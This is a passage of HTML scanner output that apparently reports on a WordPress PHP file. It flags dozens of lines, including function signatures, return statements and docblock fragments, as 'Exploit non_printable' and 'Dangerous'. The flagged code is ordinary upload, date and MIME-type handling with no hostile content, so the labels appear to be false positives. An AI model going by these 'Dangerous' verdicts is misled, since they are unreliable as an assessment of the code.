</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned with the key</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2368</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_upload_dir</span><span style="color: #007700">( </span><span style="color: #0000BB">$time </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$create_dir </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$refresh_cache </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2431</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_upload_dir</span><span style="color: #007700">( </span><span style="color: #0000BB">$time </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$timestamp </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$timezone </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2525</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2542</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">allows the caller to </span><span style="color: #007700">use </span><span style="color: #0000BB">their own method to create</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">a unique filename</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">New </span><span style="color: #0000BB">filename</span><span style="color: #007700">, if </span><span style="color: #0000BB">given wasn</span><span style="color: #DD0000">'t unique.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unique_filename</span><span style="color: #007700">( </span><span style="color: #0000BB">$dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$unique_filename_callback </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning an </span><span style="color: #007700">array </span><span style="color: #0000BB">from the filter will effectively short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit retrieval</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2664</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the passed value instead</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that generates the unique file name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2797</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_unique_filename'</span><span style="color: #007700">, </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$ext</span><span style="color: #007700">, </span><span style="color: #0000BB">$dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$unique_filename_callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$alt_filenames</span><span style="color: #007700">, </span><span style="color: #0000BB">$number </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2801</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to test </span><span style="color: #007700">if </span><span style="color: #0000BB">each of an </span><span style="color: #007700">array </span><span style="color: #0000BB">of file names could conflict with existing files</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2809</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">the tested file name could match an existing file</span><span style="color: #007700">, </span><span style="color: #0000BB">false otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_check_alternate_file_names</span><span style="color: #007700">( </span><span style="color: #0000BB">$filenames</span><span style="color: #007700">, </span><span style="color: #0000BB">$dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$files </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2826</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to check </span><span style="color: #007700">if </span><span style="color: #0000BB">a file name could match an existing image sub</span><span style="color: #007700">-</span><span style="color: #0000BB">size file name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_check_existing_file_names</span><span style="color: #007700">( </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$files </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2866</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will not move an uploaded file to the upload folder</span><span style="color: #007700">. </span><span style="color: #0000BB">It will</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2869</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">which will add it to the upload</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2889</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_upload_bits</span><span style="color: #007700">( </span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$deprecated</span><span style="color: #007700">, </span><span style="color: #0000BB">$bits</span><span style="color: #007700">, </span><span style="color: #0000BB">$time </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">, </span><span style="color: #DD0000">'2.0.0' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Empty filename' </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Sorry, you are not allowed to upload this file type.' </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2906</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$upload</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2912</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning a non</span><span style="color: #007700">-array </span><span style="color: #0000BB">from the filter will effectively short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit preparing the upload bits</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">that value instead</span><span style="color: #007700">. </span><span style="color: #0000BB">An error message should be returned </span><span style="color: #007700">as </span><span style="color: #0000BB">a string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$message </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_ext2type</span><span style="color: #007700">( </span><span style="color: #0000BB">$ext </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3003</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns first matched extension </span><span style="color: #007700">for </span><span style="color: #0000BB">the mime</span><span style="color: #007700">-</span><span style="color: #0000BB">type</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_default_extension_for_mime_type</span><span style="color: #007700">( </span><span style="color: #0000BB">$mime_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$extensions</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_check_filetype</span><span style="color: #007700">( </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$mimes </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">compact</span><span style="color: #007700">( </span><span style="color: #DD0000">'ext'</span><span style="color: #007700">, </span><span style="color: #DD0000">'type' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only supports renaming images validated via wp_get_image_mime</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_check_filetype_and_ext</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$mimes </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3099</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">compact</span><span style="color: #007700">( </span><span style="color: #DD0000">'ext'</span><span style="color: #007700">, </span><span style="color: #DD0000">'type'</span><span style="color: #007700">, </span><span style="color: #DD0000">'proper_filename' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">duplicate mime type </span><span style="color: #007700">for </span><span style="color: #0000BB">Google docs</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date should be translated</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_check_filetype_and_ext'</span><span style="color: #007700">, </span><span style="color: #0000BB">compact</span><span style="color: #007700">( </span><span style="color: #DD0000">'ext'</span><span style="color: #007700">, </span><span style="color: #DD0000">'type'</span><span style="color: #007700">, </span><span style="color: #DD0000">'proper_filename' </span><span style="color: #007700">), </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">, </span><span style="color: #0000BB">$real_mime </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3318</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the real mime type of an image file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false The actual mime type </span><span style="color: #007700">or </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the type cannot be determined</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_image_mime</span><span style="color: #007700">( </span><span style="color: #0000BB">$file </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">throws an Exception</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'getimagesize' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3355</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mime</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 337</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The date</span><span style="color: #007700">, </span><span style="color: #0000BB">declined </span><span style="color: #007700">if </span><span style="color: #0000BB">locale specifies it</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
